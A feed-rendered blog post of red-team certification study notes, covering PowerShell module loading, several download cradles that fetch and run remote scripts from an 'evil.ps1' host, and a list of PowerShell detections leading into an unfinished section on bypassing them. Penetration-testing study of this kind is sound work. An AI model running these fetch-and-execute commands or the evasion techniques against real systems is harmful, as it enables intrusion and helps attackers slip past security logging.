Notes onhttps://4ym3nn.github.io/tags/notes/Recent content in Notes onHugoen-usTue, 09 Jun 2026 17:35:00 +0100Certified Red Team Professional (CRTP) - Course Summary Noteshttps://4ym3nn.github.io/reviews/crtp-summary/Tue, 09 Jun 2026 17:35:00 +0100https://4ym3nn.github.io/reviews/crtp-summary/<h1 id="1-powershell-basics">1. PowerShell Basics</h1> <h2 id="importing-modules">Importing Modules</h2> <ul> <li>Load a PowerShell script using <strong>dot sourcing</strong>:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>. C:\AD\Tools\PowerView.ps1 </span></span></code></pre></div><ul> <li>A module (or a script) can be imported with:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1 </span></span></code></pre></div><ul> <li>All the commands in a module can be listed with:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>Get-Command -Module &lt;modulename&gt; </span></span></code></pre></div><h2 id="powershell-script-execution---download-cradles">PowerShell Script Execution - Download Cradles</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>iex (New-Object Net.WebClient).DownloadString(<span style="color:#e6db74">&#39;https://webserver/payload.ps1&#39;</span>) </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$ie=New-Object -ComObject </span></span><span style="display:flex;"><span>InternetExplorer.Application;$ie.visible=$False;$ie.navigate(<span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>);sleep <span style="color:#ae81ff">5</span>;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span><span style="color:#75715e"># PSv3 onwards</span> </span></span><span style="display:flex;"><span>iex (iwr <span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>) </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$h=New-Object -ComObject </span></span><span style="display:flex;"><span>Msxml2.XMLHTTP;$h.open(<span style="color:#e6db74">&#39;GET&#39;</span>,<span style="color:#e6db74">&#39;http://192.168.230.1/evil.ps1&#39;</span>,$false);$h.send();iex </span></span><span style="display:flex;"><span>$h.responseText </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>$wr = [<span style="color:#66d9ef">System.NET.WebRequest</span>]::Create(<span style="color:#e6db74">&#34;http://192.168.230.1/evil.ps1&#34;</span>) </span></span><span style="display:flex;"><span>$r = $wr.GetResponse() </span></span><span style="display:flex;"><span>IEX ([<span style="color:#66d9ef">System.IO.StreamReader</span>]($r.GetResponseStream())).ReadToEnd() </span></span></code></pre></div><hr> <h1 id="2-powershell-security--evasion">2. PowerShell Security &amp; Evasion</h1> <h2 id="powershell-detections">PowerShell Detections</h2> <ol> <li><strong>System-wide transcription</strong></li> <li><strong>Script Block logging</strong></li> <li><strong>AMSI</strong></li> <li><strong>CLM</strong> - Integrated with AppLocker and WDAC (Device Guard)</li> </ol> <h2 id="bypassing-powershell-security">Bypassing PowerShell Security</h2> <p><strong>Using Invisi-Shell:</strong></p>